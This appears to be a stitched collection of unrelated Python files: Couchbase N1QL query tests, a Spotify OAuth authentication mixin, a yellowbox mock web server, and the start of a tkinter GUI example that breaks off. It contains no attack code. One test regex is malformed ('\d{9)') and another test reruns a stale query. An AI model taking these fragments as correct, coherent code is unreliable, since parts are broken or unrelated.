actual_result, expected_result = self.run_query_from_template(query_template)
if self.monitoring:
e.set()
t8.join(100)
self._verify_results(actual_result['results'], expected_result)
def test_alias_unnest(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT count(skill) FROM %s AS emp UNNEST emp.$list_str0 AS skill' %(
bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
query_template = 'SELECT count(skill) FROM %s AS emp UNNEST emp.$list_str0 skill' %(
bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
##############################################################################################
#
# ORDER BY CHECKS
##############################################################################################
def test_order_by_check(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $str0, $str1, $obj0.$_obj0_int0 points FROM %s' % (bucket.name) +\
' ORDER BY $str1, $str0, $obj0.$_obj0_int0'
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
query_template = 'SELECT $str0, $str1 FROM %s' % (bucket.name) +\
' ORDER BY $obj0.$_obj0_int0, $str0, $str1'
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
def test_order_by_alias(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $str1, $obj0 AS points FROM %s' % (bucket.name) +\
' AS test ORDER BY $str1 DESC, points DESC'
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
def test_order_by_alias_arrays(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $str1, $obj0, $list_str0[0] AS SKILL FROM %s' % (
bucket.name) +\
' AS TEST ORDER BY SKILL, $str1, TEST.$obj0'
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
def test_order_by_alias_aggr_fn(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $int0, $int1, count(*) AS emp_per_month from %s'% (
bucket.name) +\
' WHERE $int1 >7 GROUP BY $int0, $int1 ORDER BY emp_per_month, $int1, $int0'
actual_result, expected_result = self.run_query_from_template(query_template)
#self.assertTrue(len(actual_result['results'])== 0)
def test_order_by_aggr_fn(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $str1 AS TITLE, min($int1) day FROM %s GROUP' % (bucket.name) +\
' BY $str1 ORDER BY MIN($int1), $str1'
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
if self.analytics:
self.query = 'SELECT d.email AS TITLE, min(d.join_day) day FROM %s d GROUP' % (bucket.name) +\
' BY d.$str1 ORDER BY MIN(d.join_day), d.$str1'
actual_result1 = self.run_cbq_query()
self._verify_results(actual_result1['results'], actual_result['results'])
def test_order_by_precedence(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $str0, $str1 FROM %s' % (bucket.name) +\
' ORDER BY $str0, $str1'
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
query_template = 'SELECT $str0, $str1 FROM %s' % (bucket.name) +\
' ORDER BY $str1, $str0'
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
def test_order_by_satisfy(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $str0, $list_obj0 FROM %s AS employee ' % (bucket.name) +\
'WHERE ANY vm IN employee.$list_obj0 SATISFIES vm.$_list_obj0_int0 > 5 AND' +\
' vm.$_list_obj0_str0 = "ubuntu" END ORDER BY $str0, $list_obj0[0].$_list_obj0_int0'
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
##############################################################################################
#
# DISTINCT
##############################################################################################
def test_distinct(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT DISTINCT $str1 FROM %s ORDER BY $str1' % (bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
def test_distinct_nested(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT DISTINCT $obj0.$_obj0_int0 as VAR FROM %s ' % (bucket.name) +\
'ORDER BY $obj0.$_obj0_int0'
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
query_template = 'SELECT DISTINCT $list_str0[0] as skill' +\
' FROM %s ORDER BY $list_str0[0]' % (bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
self.query = 'SELECT DISTINCT $obj0.* FROM %s' % (bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
##############################################################################################
#
# COMPLEX PATHS
##############################################################################################
#Not used anywhere
def test_simple_complex_paths(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $_obj0_int0 FROM %s.$obj0' % (bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
#Not used anywhere
def test_alias_complex_paths(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $_obj0_int0 as new_attribute FROM %s.$obj0' % (bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
#Not used anywhere
def test_where_complex_paths(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $_obj0_int0 FROM %s.$obj0 WHERE $_obj0_int0 = 1' % (bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
def test_new_contains_functions(self):
self.query = 'SELECT * FROM default WHERE ANY v IN tokens(default, {"specials":true}) SATISFIES REGEXP_LIKE(TOSTRING(v),"(\d{3}-\d{2}-\d{4})|\d{9)|(\d{3}[ ]\d{2}[ ]\d{4})")END order by meta().id'
expected_result = self.run_cbq_query()
self.query = 'SELECT * FROM default WHERE CONTAINS_TOKEN_REGEXP(TOSTRING(v),"(\d{3}-\\d{2}-\\d{4})|(\\b\\d{9}\\b)|(\\d{3}[ ]\\d{2}[ ]\\d{4})") order by meta().id'
actual_result = self.run_cbq_query()
self.assertEqual(actual_result['results'], expected_result['results'])
self.query = 'SELECT * FROM default WHERE CONTAINS_TOKEN_REGEXP(TOSTRING(v),"(\d{3}-\d{2}-\d{4})|\d{9)|(\d{3}[ ]\d{2}[ ]\d{4})") order by meta().id'
actual_result = self.run_cbq_query()
self.assertEqual(actual_result['results'], expected_result['results'])
|
auth.py
|
import socket
import threading
import uuid
from pathlib import Path
from wsgiref.simple_server import make_server
import hug
from cachecontrol import CacheControlAdapter
from cachecontrol.caches.file_cache import FileCache
from oauthlib.oauth2 import BackendApplicationClient
from pony.orm import get
from requests_oauthlib import OAuth2Session
from .. import config, logger, root
from ..cache import User, db_session, select
from ..constants import API, AllScopes, AuthFlow
from ..exceptions import SpotifyCredentialsException
AUTH_HTML_FILE = root / "html" / "auth_message.html"
CACHE_FILE = Path.home() / ".cache" / "spfy" / ".web_cache"
class AuthMixin:
def __init__(
self,
*args,
client_id=None,
client_secret=None,
redirect_uri=None,
user_id=None,
username=None,
**kwargs,
):
super().__init__(*args, **kwargs)
self.client_id = client_id or config.app.client_id
self.client_secret = client_secret or config.app.client_secret
self.redirect_uri = self._get_redirect_uri(redirect_uri)
self.user_id = user_id
self.username = username
self.callback_reached = threading.Event()
self.flow = None
self.session = None
@staticmethod
def _get_redirect_uri(redirect_uri):
redirect_uri = (
redirect_uri
or config.app.redirect_uri
or f"http://{socket.gethostname()}.local"
)
if config.auth.callback.enabled and config.auth.callback.port and redirect_uri:
redirect_uri += f":{config.auth.callback.port}"
return redirect_uri
@staticmethod
def get_session(*args, **kwargs):
session = OAuth2Session(*args, **kwargs)
cache_adapter = CacheControlAdapter(
cache=FileCache(CACHE_FILE),
pool_connections=config.http.connections,
pool_maxsize=config.http.connections,
max_retries=config.http.retries,
)
session.mount("http://", cache_adapter)
return session
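    # Hedged note: the CacheControlAdapter above gives the OAuth session an on-disk
    # HTTP cache (CACHE_FILE) plus a bounded connection pool and retry policy; as
    # written, it is mounted for plain-HTTP URLs only.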
@property
@db_session
def user(self):
return User[self.user_id]
@property
def is_authenticated(self):
return bool(self.session and self.session.authorized)
@db_session
def authenticate_user(
self,
username=None,
email=None,
code=None,
state=None,
auth_response=None,
scope=AllScopes,
):
self.flow = AuthFlow.AUTHORIZATION_CODE
session = self.session or self.get_session(
self.client_id,
redirect_uri=self.redirect_uri,
scope=scope,
auto_refresh_url=API.TOKEN.value,
)
if self.user_id:
user = User.get(id=self.user_id)
if user and user.token:
session.token = user.token
session.token_updater = User.token_updater(user.id)
return session
if username or email:
user = get(u for u in User if u.username == username or u.email == email)
if user:
self.user_id = user.id
self.username = user.username
session.token = user.token
session.token_updater = User.token_updater(user.id)
return session
if code or auth_response:
token = session.fetch_token(
token_url=API.TOKEN.value,
client_id=self.client_id,
client_secret=self.client_secret,
code=code,
state=state,
authorization_response=auth_response,
)
user_details = self.current_user()
user = (
select(
u
for u in User
if u.username == user_details.id or u.email == user_details.email
)
.for_update()
.get()
)
if user:
user.token = token
if user.id != self.user_id:
self.user_id = user.id
self.username = user.username
elif self.user_id:
user = User.get_for_update(id=self.user_id)
if user:
user.token = token
if not user:
self.user_id = self.user_id or uuid.uuid4()
user_details["user_id"] = self.user_id
user_details["token"] = token
user = User.from_dict(user_details)
self.username = user.username
return session
return session
@db_session
def authenticate_server(self):
self.flow = AuthFlow.CLIENT_CREDENTIALS
default_user = User.default()
self.user_id = default_user.id
self.username = default_user.username
session = self.session or self.get_session(
client=BackendApplicationClient(self.client_id)
)
session.token_updater = User.token_updater(default_user.id)
if default_user.token:
session.token = default_user.token
else:
default_user.token = session.fetch_token(
token_url=API.TOKEN.value,
client_id=self.client_id,
client_secret=self.client_secret,
)
return session
def authenticate(self, flow=config.auth.flow, **auth_params):
if not (self.client_id and self.client_secret):
raise SpotifyCredentialsException
self.flow = AuthFlow(flow)
if self.flow == AuthFlow.CLIENT_CREDENTIALS:
self.session = self.authenticate_server()
elif self.flow == AuthFlow.AUTHORIZATION_CODE:
self.session = self.authenticate_user(**auth_params)
if not self.session.token:
if config.auth.callback.enabled:
self.start_callback()
authorization_url, _ = self.session.authorization_url(
API.AUTHORIZE.value
)
if config.auth.send_auth_url_to_email:
email = auth_params.get("email") or config.auth.email
self.send_auth_email(email, authorization_url)
else:
print(f"Login here: {authorization_url}")
self.wait_for_authorization()
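    # Illustrative usage sketch (hedged; SomeSpotifyClient is a hypothetical class
    # that mixes in AuthMixin and provides current_user()/send_auth_email()):
    #
    #   client = SomeSpotifyClient(client_id="...", client_secret="...")
    #   client.authenticate(flow=AuthFlow.CLIENT_CREDENTIALS.value)  # server-to-server
    #   client.authenticate(flow=AuthFlow.AUTHORIZATION_CODE.value,  # interactive login
    #                       email="user@example.com")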
def wait_for_authorization(self):
if not config.auth.callback.enabled:
url = input("Paste the URL you are redirected to:")
self.session = self.authenticate_user(auth_response=url)
else:
self.callback_reached.wait(config.auth.callback.timeout)
self.stop_callback()
def stop_callback(self):
if self.httpd:
self.httpd.shutdown()
def start_callback(self):
self.callback_reached.clear()
# pylint: disable=unused-variable
@hug.get("/", output=hug.output_format.html)
def callback(code: hug.types.text, state: hug.types.text):
html = AUTH_HTML_FILE.read_text() # pylint: disable=no-member
try:
self.session = self.authenticate_user(code=code, state=state)
html = html.replace("SPOTIFY_AUTH_MESSAGE", "Successfully logged in!")
html = html.replace("BACKGROUND_COLOR", "#65D46E")
except Exception as exc:
logger.exception(exc)
html = html.replace(
"SPOTIFY_AUTH_MESSAGE", "Could not get authorization token."
)
html = html.replace("BACKGROUND_COLOR", "#EC2E50")
finally:
self.callback_reached.set()
return html
api = __hug__.http.server(None) # pylint: disable=undefined-variable
self.httpd = make_server("", config.auth.callback.port, api)
threading.Thread(target=self.httpd.serve_forever, daemon=True).start()
|
webserver.py
|
from __future__ import annotations
from contextlib import contextmanager
from copy import deepcopy
from functools import partial
from threading import Lock, Thread
from time import sleep
from typing import Awaitable, Callable, ContextManager, Iterable, Iterator, List, Optional, Tuple, Union, overload
from requests import ConnectionError, HTTPError, get
from starlette.applications import Starlette
from starlette.requests import Request
from starlette.responses import PlainTextResponse, Response
from starlette.routing import BaseRoute, Route, WebSocketRoute
from starlette.status import HTTP_500_INTERNAL_SERVER_ERROR, WS_1011_INTERNAL_ERROR
from starlette.websockets import WebSocket
from uvicorn import Config, Server
from uvicorn.config import LOGGING_CONFIG
from yellowbox import YellowService
from yellowbox.extras.webserver.http_request_capture import RecordedHTTPRequest, RecordedHTTPRequests
from yellowbox.extras.webserver.util import mute_uvicorn_log
from yellowbox.extras.webserver.ws_request_capture import RecordedWSTranscripts, recorder_websocket_endpoint
from yellowbox.retry import RetrySpec
from yellowbox.utils import docker_host_name
class HandlerError(Exception):
"""
An exception occurred while handling an endpoint in the webserver thread
"""
HTTP_SIDE_EFFECT = Union[Response, Callable[[Request], Awaitable[Response]]]
WS_SIDE_EFFECT = Callable[[WebSocket], Awaitable[Optional[int]]]
METHODS = Union[str, Iterable[str]]
class EndpointPatch(ContextManager):
"""
    The return value of an endpoint side-effect patch; restores the original side effect when exited
"""
def __init__(self, endpoint: Union[MockHTTPEndpoint, MockWSEndpoint], restore_side_effect):
self.endpoint = endpoint
self.restore_side_effect = restore_side_effect
def __exit__(self, exc_type, exc_val, exc_tb):
self.endpoint.side_effect = self.restore_side_effect
self.endpoint.owner._raise_from_pending()
class MockHTTPEndpoint:
"""
A mock http endpoint for a webserver
"""
def __init__(self, name: str, methods: METHODS, rule_string: str, side_effect: HTTP_SIDE_EFFECT,
auto_read_body: bool = True, forbid_implicit_head_verb: bool = True):
"""
Args:
name: the name of the endpoint
methods: the methods by which the endpoint is accessible
rule_string: the rule-string of the endpoint, as specified by starlette routes
side_effect: the side effect of the endpoint. This can be either a starlette response, or an async callable
that accepts a starlette request and returns a starlette response.
auto_read_body: If true (the default), the request is always awaited to be received in full before replying
to the client.
forbid_implicit_head_verb: By default, starlette automatically makes all routes that are accessible by the
GET method also accessible through the HEAD method. If this parameter is set to true (the default),
this behaviour is disabled and HEAD must be added explicitly if required.
"""
self._request_captures: List[RecordedHTTPRequests] = []
self.owner: Optional[WebServer] = None
if isinstance(methods, str):
methods = (methods,)
self.methods: Tuple[str, ...] = tuple(m.upper() for m in methods)
self.rule_string = rule_string
self.__name__ = name
self.side_effect = side_effect
self.auto_read_body = auto_read_body
self.forbid_implicit_head_verb = forbid_implicit_head_verb
def patch(self, side_effect: HTTP_SIDE_EFFECT):
"""
Change the side effect of the endpoint
Args:
side_effect: the new side effect of the endpoint
Returns:
A context manager that, if exited, restores the endpoint's original side effect
"""
self.owner._raise_from_pending()
previous_side_effect = self.side_effect
self.side_effect = side_effect
return EndpointPatch(self, previous_side_effect)
@contextmanager
def capture_calls(self) -> Iterator[RecordedHTTPRequests]:
"""
A context manager that records all requests to the endpoint in its scope to a list
Returns:
A RecordedHTTPRequests to which the requests are recorded
"""
self.owner._raise_from_pending()
if not self.auto_read_body:
raise RuntimeError("cannot capture calls if auto_read_body is disabled")
calls = RecordedHTTPRequests()
self._request_captures.append(calls)
try:
yield calls
finally:
if self._request_captures[-1] is not calls:
raise RuntimeError('capture_calls contexts cannot be used in parallel')
self._request_captures.pop()
self.owner._raise_from_pending()
async def get(self, request: Request):
# the target of the starlette route
if not self.owner:
raise RuntimeError('endpoint must be assigned to a webserver')
if self.owner._pending_exception:
return PlainTextResponse(
f'an exception in the webserver had previously occurred: {self.owner._pending_exception!r}',
status_code=HTTP_500_INTERNAL_SERVER_ERROR
)
try:
if isinstance(self.side_effect, Response):
ret = self.side_effect
else:
ret = await self.side_effect(request)
except Exception as ex:
self.owner._pending_exception = ex
return PlainTextResponse(f'handler raised an exception: {ex!r}', status_code=HTTP_500_INTERNAL_SERVER_ERROR)
else:
if self.auto_read_body:
await request.body()
if self._request_captures: # recording the request reads its body, which we might not want
recorded = await RecordedHTTPRequest.from_request(request)
for c in self._request_captures:
c.append(recorded)
return ret
def route(self) -> BaseRoute:
"""
Returns: a starlette route representing the endpoint
"""
ret = Route(self.rule_string, self.get, methods=self.methods, name=self.__name__) # type:ignore[arg-type]
if self.forbid_implicit_head_verb and 'HEAD' not in self.methods:
ret.methods.discard('HEAD')
return ret
@overload
def http_endpoint(methods: METHODS, rule_string: str, *, auto_read_body: bool = True, forbid_implicit_head_verb: bool = True) \
-> Callable[[HTTP_SIDE_EFFECT], MockHTTPEndpoint]: ...
@overload
def http_endpoint(methods: METHODS, rule_string: str, side_effect: HTTP_SIDE_EFFECT, *, auto_read_body: bool = True,
forbid_implicit_head_verb: bool = True) -> MockHTTPEndpoint: ...
def http_endpoint(methods: METHODS, rule_string: str, side_effect: Optional[HTTP_SIDE_EFFECT] = None, **kwargs):
"""
Create a mock HTTP endpoint.
Args:
methods: forwarded to MockHTTPEndpoint
rule_string: forwarded to MockHTTPEndpoint
side_effect: forwarded to MockHTTPEndpoint
**kwargs: forwarded to MockHTTPEndpoint
Returns:
an http endpoint
Notes:
can also be used as a decorator, when decorating the side effect
Examples:
>>> @http_endpoint('GET', '/bar')
... async def bar(request: Request):
... return PlainTextResponse(int(request.query_params['x'])**2)
...
... WebServer().add_http_endpoint(bar)
"""
def ret(func: HTTP_SIDE_EFFECT):
try:
name = func.__name__ # type: ignore[union-attr]
except AttributeError:
name = f'{methods} {rule_string}'
return MockHTTPEndpoint(name, methods, rule_string, func, **kwargs)
if side_effect is None:
return ret
return ret(side_effect)
class MockWSEndpoint:
"""
A mock websocket endpoint for a webserver
"""
def __init__(self, name: str, rule_string: str, side_effect: WS_SIDE_EFFECT):
"""
Args:
name: the name of the endpoint
rule_string: the rule-string of the endpoint, as specified by starlette routes
side_effect: the side effect of the endpoint. This should be an async callable that accepts a starlette
websocket and optionally returns an int to close the connection with that code.
"""
self._request_captures: List[RecordedWSTranscripts] = []
self.owner: Optional[WebServer] = None
self.rule_string = rule_string
self.__name__ = name
self.side_effect = side_effect
# this will be the endpoint handed to the starlette.WebSocketRoute.
# the route chooses whether to hand off the scope, receive, send functions (which we need) only if we fail
# inspect.isfunction and inspect.ismethod. Fortunately, partial fails these tests. By storing it as an
# attribute of the endpoint, we will be able to better locate routes relating to the endpoint
self.endpoint = partial(recorder_websocket_endpoint, function=self.get, sinks=self._request_captures)
async def get(self, websocket: WebSocket):
# this will be the function that our endpoint will eventually route to
if not self.owner:
await websocket.close(WS_1011_INTERNAL_ERROR) # note that this will actually send a 403 code :shrug:
return
if self.owner._pending_exception:
await websocket.close(WS_1011_INTERNAL_ERROR) # note that this will actually send a 403 code :shrug:
return
try:
code = await self.side_effect(websocket)
except Exception as ex:
self.owner._pending_exception = ex
await websocket.close(WS_1011_INTERNAL_ERROR)
else:
if code is not None:
await websocket.close(code)
def patch(self, side_effect: WS_SIDE_EFFECT):
"""
Change the side effect of the endpoint
Args:
side_effect: the new side effect of the endpoint
Returns:
A context manager that, if exited, restores the endpoint's original side effect
"""
self.owner._raise_from_pending()
previous_side_effect = self.side_effect
self.side_effect = side_effect
return EndpointPatch(self, previous_side_effect)
@contextmanager
def capture_calls(self) -> Iterator[RecordedWSTranscripts]:
self.owner._raise_from_pending()
calls = RecordedWSTranscripts()
self._request_captures.append(calls)
try:
yield calls
finally:
if self._request_captures[-1] is not calls:
raise RuntimeError('capture_calls contexts cannot be used in parallel')
self._request_captures.pop()
self.owner._raise_from_pending()
@overload
def ws_endpoint(rule_string: str) -> Callable[[WS_SIDE_EFFECT], MockWSEndpoint]: pass
@overload
def ws_endpoint(rule_string: str, side_effect: WS_SIDE_EFFECT) -> MockWSEndpoint: pass
def ws_endpoint(rule_string: str, side_effect: Optional[WS_SIDE_EFFECT] = None):
"""
Create a mock websocket endpoint.
Args:
rule_string: forwarded to MockWSEndpoint
side_effect: forwarded to MockWSEndpoint
Returns:
a websocket endpoint
Notes:
can also be used as a decorator, when decorating the side effect
Examples:
>>> @ws_endpoint('/square')
... async def square(ws: WebSocket):
... await ws.accept()
... x = int(await ws.receive_text())
... await ws.send_text(str(x*x))
... await ws.close()
...
... WebServer().add_ws_endpoint(square)
"""
def ret(func: WS_SIDE_EFFECT):
return MockWSEndpoint(func.__name__, rule_string, func)
if side_effect is None:
return ret
return ret(side_effect)
DEFAULT_LOG_CONFIG = deepcopy(LOGGING_CONFIG)
class WebServer(YellowService):
"""
An easy-to-modify HTTP and websocket server, wrapping a starlette application
"""
PORT_ACCESS_MAX_RETRIES = 100 # the maximum number of attempts to make when accessing a binding port. Each attempt
# has an interval of 0.01 seconds
def __init__(self, name: str, port: Optional[int] = None, log_config=DEFAULT_LOG_CONFIG, **kwargs):
"""
Args:
name: the name of the service
port: the port to bind to when serving, default will bind to an available port
            log_config: the logging configuration for the uvicorn server. By default, will override the access format
to include the service name.
**kwargs: forwarded to the uvicorn configuration.
"""
self._app = Starlette(debug=True)
self._route_lock = Lock()
# since the main thread won't catch errors in handlers, this class will store any error raised while handling,
# and raise them in the main thread as soon as we can
self._pending_exception: Optional[Exception] = None
if log_config is DEFAULT_LOG_CONFIG:
log_config = deepcopy(DEFAULT_LOG_CONFIG)
log_config['formatters']['access']['fmt'] = f'%(levelprefix)s {name} - "%(request_line)s" %(status_code)s'
self._port = port
config = Config(self._app, **kwargs, port=self._port, log_config=log_config)
self._server = Server(config)
self._serve_thread = Thread(name=f'{name}_thread', target=self._server.run)
@property
def port(self) -> Optional[int]:
"""
Returns:
The port the service is bound to, if the service is binding to anything.
Notes:
            Will only return None if the port was not provided during construction and the service thread is not running.
            If the service is starting up, this property will block until the port is bound, or raise an error if
            blocked for longer than 1 second.
"""
if self._port or not self._serve_thread.is_alive():
return self._port
for _ in range(self.PORT_ACCESS_MAX_RETRIES):
servers = getattr(self._server, 'servers', None)
if servers:
sockets = getattr(servers[0], 'sockets', None)
if sockets:
socket = sockets[0]
break
sleep(0.01)
else:
raise RuntimeError('timed out when getting binding port')
self._port = socket.getsockname()[1]
return self._port
@overload
def add_http_endpoint(self, endpoint: MockHTTPEndpoint) -> MockHTTPEndpoint:
...
@overload
def add_http_endpoint(self, methods: METHODS, rule_string: str, side_effect: HTTP_SIDE_EFFECT, *,
auto_read_body: bool = True, forbid_implicit_head_verb: bool = True) -> MockHTTPEndpoint:
...
def add_http_endpoint(self, *args, **kwargs) -> MockHTTPEndpoint:
"""
Add an http endpoint to the server
Args:
            *args: either a single mock http endpoint, or parameters forwarded to http_endpoint to construct one
**kwargs: forwarded to http_endpoint to construct an endpoint
Returns:
the http endpoint added to the server
"""
self._raise_from_pending()
if len(args) == 1 and not kwargs:
ep, = args
else:
ep = http_endpoint(*args, **kwargs)
if ep.owner is not None:
raise RuntimeError('an endpoint cannot be added twice')
with self._route_lock:
self._app.routes.append(
ep.route()
)
ep.owner = self
return ep
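    # Hedged usage sketch, with a made-up WebServer instance `server` and a made-up
    # '/ping' route; both call forms accepted by the overloads above:
    #   server.add_http_endpoint(http_endpoint('GET', '/ping', PlainTextResponse('pong')))
    #   server.add_http_endpoint('GET', '/ping', PlainTextResponse('pong'))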
def remove_http_endpoint(self, endpoint: MockHTTPEndpoint):
"""
Remove an http endpoint previously added to the server
Args:
endpoint: the endpoint to remove
"""
self._raise_from_pending()
if endpoint.owner is not self:
raise RuntimeError('endpoint is not added to the server')
with self._route_lock:
for i, route in enumerate(self._app.router.routes):
if isinstance(route, Route) and route.endpoint == endpoint.get:
break
else:
raise RuntimeError('endpoint is not found in the server')
self._app.router.routes.pop(i)
endpoint.owner = None
@overload
def patch_http_endpoint(self, endpoint: MockHTTPEndpoint) -> ContextManager[MockHTTPEndpoint]:
...
@overload
def patch_http_endpoint(self, methods: METHODS, rule_string: str, side_effect: HTTP_SIDE_EFFECT, *,
                            auto_read_body: bool = True, forbid_implicit_head_verb: bool = True) \
-> ContextManager[MockHTTPEndpoint]:
...
@contextmanager # type:ignore[misc]
def patch_http_endpoint(self, *args, **kwargs) -> Iterator[MockHTTPEndpoint]:
"""
A context manager to add and then remove an http endpoint
Args:
*args: forwarded to self.add_http_endpoint
**kwargs: forwarded to self.add_http_endpoint
Returns:
The temporarily added endpoint
"""
ep = self.add_http_endpoint(*args, **kwargs)
try:
yield ep
finally:
self.remove_http_endpoint(ep)
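    # Hedged usage sketch (made-up `server` instance and '/health' route); the
    # endpoint only exists inside the with-block:
    #   with server.patch_http_endpoint('GET', '/health', PlainTextResponse('ok')):
    #       assert get(server.local_url() + '/health').text == 'ok'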
@overload
def add_ws_endpoint(self, endpoint: MockWSEndpoint) -> MockWSEndpoint:
...
@overload
def add_ws_endpoint(self, rule_string: str, side_effect: WS_SIDE_EFFECT) -> MockWSEndpoint:
...
def add_ws_endpoint(self, *args, **kwargs):
"""
Add a websocket endpoint to the server
Args:
            *args: either a single mock ws endpoint, or parameters forwarded to ws_endpoint to construct one
**kwargs: forwarded to ws_endpoint to construct an endpoint
Returns:
the websocket endpoint added to the server
"""
self._raise_from_pending()
if len(args) == 1 and not kwargs:
ep, = args
else:
ep = ws_endpoint(*args, **kwargs)
if ep.owner is not None:
raise RuntimeError('an endpoint cannot be added twice')
with self._route_lock:
self._app.routes.append(
WebSocketRoute(ep.rule_string, ep.endpoint, name=ep.__name__)
)
ep.owner = self
return ep
def remove_ws_endpoint(self, endpoint: MockWSEndpoint):
"""
Remove a websocket endpoint previously added to the server
Args:
endpoint: the endpoint to remove
"""
self._raise_from_pending()
if endpoint.owner is not self:
raise RuntimeError('endpoint is not added to the server')
with self._route_lock:
for i, route in enumerate(self._app.router.routes):
if isinstance(route, WebSocketRoute) and route.app == endpoint.endpoint:
break
else:
raise RuntimeError('endpoint is not found in the server')
self._app.router.routes.pop(i)
endpoint.owner = None
@overload
def patch_ws_endpoint(self, endpoint: MockWSEndpoint) -> ContextManager[MockWSEndpoint]:
...
@overload
def patch_ws_endpoint(self, rule_string: str, side_effect: WS_SIDE_EFFECT) -> ContextManager[MockWSEndpoint]:
...
@contextmanager # type:ignore[misc]
def patch_ws_endpoint(self, *args, **kwargs):
"""
A context manager to add and then remove a ws endpoint
Args:
*args: forwarded to self.add_ws_endpoint
**kwargs: forwarded to self.add_ws_endpoint
Returns:
The temporarily added endpoint
"""
ep = self.add_ws_endpoint(*args, **kwargs)
try:
yield ep
finally:
self.remove_ws_endpoint(ep)
def local_url(self, schema: Optional[str] = 'http') -> str:
"""
Get the url to access this server from the local machine
Args:
schema: the optional schema of the url, defaults to http
"""
if schema is None:
return f'localhost:{self.port}'
return f'{schema}://localhost:{self.port}'
def container_url(self, schema='http') -> str:
"""
Get the url to access this server from a docker container running in the local machine
Args:
schema: the optional schema of the url, defaults to http
"""
if schema is None:
return f'{docker_host_name}:{self.port}'
return f'{schema}://{docker_host_name}:{self.port}'
def start(self, retry_spec: Optional[RetrySpec] = None) -> WebServer:
if self._serve_thread.is_alive():
raise RuntimeError('thread cannot be started twice')
with mute_uvicorn_log():
self._serve_thread.start()
with self.patch_http_endpoint('GET', '/__yellowbox/ping', side_effect=PlainTextResponse('')):
retry_spec = retry_spec or RetrySpec(interval=0.1, timeout=5)
retry_spec.retry(
lambda: get(self.local_url() + '/__yellowbox/ping').raise_for_status(),
(ConnectionError, HTTPError)
)
return super().start()
def stop(self):
with mute_uvicorn_log():
self._server.should_exit = True
self._serve_thread.join()
super().stop()
self._raise_from_pending()
def is_alive(self) -> bool:
self._raise_from_pending()
return self._serve_thread.is_alive()
def _raise_from_pending(self):
# if there is a pending exception, this will raise it
if self._pending_exception:
pending = self._pending_exception
self._pending_exception = None
raise HandlerError() from pending
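# Illustrative end-to-end sketch (hedged, not part of the original module): assumes
# local port 8080 is free; the '/ping' route below is made up for demonstration.
if __name__ == '__main__':
    demo_server = WebServer('demo', port=8080)
    demo_server.add_http_endpoint(http_endpoint('GET', '/ping', PlainTextResponse('pong')))
    demo_server.start()
    try:
        print(get(demo_server.local_url() + '/ping').text)  # expected to print "pong"
    finally:
        demo_server.stop()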
|
GUI_copy_files_limit.py
|
'''
May 2017
@author: Burkhard A. Meier
'''
#======================
# imports
#======================
import tkinter as tk
from tkinter import ttk
from tkinter import scrolledtext
from tkinter import Menu
from tkinter import messagebox as msg
from tkinter import Spinbox
from time import sleep
import Ch04_Code.ToolTip as tt
from threading import Thread
from queue import Queue
import Ch06_Code.Queues as bq
from tkinter import filedialog as fd
from os import path, makedirs
# Module level GLOBALS
GLOBAL_CONST = 42
fDir = path.dirname(__file__)
netDir = fDir + '\\Backup'
if not path.exists(netDir):
makedirs(netDir, exist_ok = True)
#=====================================================
class OOP():
def __init__(self): # Initializer method
# Create instance
self.win = tk.Tk()
# Add a title
self.win.title("Python GUI")
# Create a Queue
self.gui_queue = Queue()
self.create_widgets()
self.defaultFileEntries()
def defaultFileEntries(self):
self.fileEntry.delete(0, tk.END)
self.fileEntry.insert(0, fDir)
if len(fDir) > self.entryLen:
# self.fileEntry.config(width=len(fDir) + 3)
self.fileEntry.config(width=35) # limit width to adjust GUI
self.fileEntry.config(state='readonly')
self.netwEntry.delete(0, tk.END)
self.netwEntry.insert(0, netDir)
if len(netDir) > self.entryLen:
# self.netwEntry.config(width=len(netDir) + 3)
self.netwEntry.config(width=35) # limit width to adjust GUI
# Create Queue instance
def use_queues(self, loops=5):
# Now using a class member Queue
while True:
print(self.gui_queue.get())
def method_in_a_thread(self, num_of_loops=10):
for idx in range(num_of_loops):
sleep(1)
self.scrol.insert(tk.INSERT, str(idx) + '\n')
# Running methods in Threads
def create_thread(self, num=1):
self.run_thread = Thread(target=self.method_in_a_thread, args=[num])
        self.run_thread.daemon = True
self.run_thread.start()
# start queue in its own thread
